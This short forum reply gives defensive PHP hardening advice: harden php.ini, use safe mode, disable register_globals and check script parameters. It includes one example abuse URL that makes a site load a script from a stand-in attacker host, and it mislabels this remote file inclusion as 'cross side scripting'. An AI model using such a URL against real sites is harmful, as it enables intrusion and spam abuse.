What about cross side scripting. If any of the scripts running on your side allows to name a script url as a parameter that can be hosted on another server, you'll have a problem. Harden your php.ini, setup up safe mode for php, prevent register_globals and double check each script and the way it checks the parameter Example for abuse http://your.host.com/callsite?url=http://attackers.host.com/spammail.php Hope that helps Yours Michael